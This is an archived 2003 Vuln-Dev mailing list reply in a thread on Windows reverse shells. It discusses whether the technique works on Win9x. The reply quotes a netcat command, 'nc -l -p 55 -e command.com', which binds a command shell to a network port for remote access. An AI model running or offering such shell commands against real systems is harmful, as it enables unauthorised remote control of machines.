Vulnerability Development mailing list archives
Re: Windows reverse Shell #2
From: "Ali Saifullah Khan" <ali_saifullah () hotmail com>
Date: Sat, 8 Feb 2003 03:02:51 +0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Setting up my netcat listener on the remote host using nc -l -p 55 -e command.com -vv ( This is really what the doc. states, so no improvisation is intended ) and subsequently telnetting from localhost to port 55 on the remote machine worked for me. I suppose the reverse cmd shell, though winnt specific should work just as well. I haven't tested it though, so i can't make any promises as regards the result. - ----- Original Message ----- From: s7726 <s7726 () yahoo com> To: Vuln-Dev List <vuln-dev () securityfocus com> Sent: Friday, February 07, 2003 11:09 PM Subject: RE: Windows reverse Shell #2
Could this work on a win9x machine? with some mods of course. namely command rather than cmd, or is this strictly an NT/2k thing? Thanx, Gavin S.
-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBPkQtB6Y14W4nfusvEQKMpgCg1ncYATNoeHwZC0rBXUuZRDXXm2cAnA1N M5ccUp3+CadQMJwqukxQz9Iy =Dfa6 -----END PGP SIGNATURE-----
Current thread:
- Windows reverse Shell #2 NetNinja (Feb 07)
- RE: Windows reverse Shell #2 s7726 (Feb 07)
- Re: Windows reverse Shell #2 Ali Saifullah Khan (Feb 07)
- Re[2]: Windows reverse Shell #2 NetNinja (Feb 09)
- RE: Windows reverse Shell #2 s7726 (Feb 07)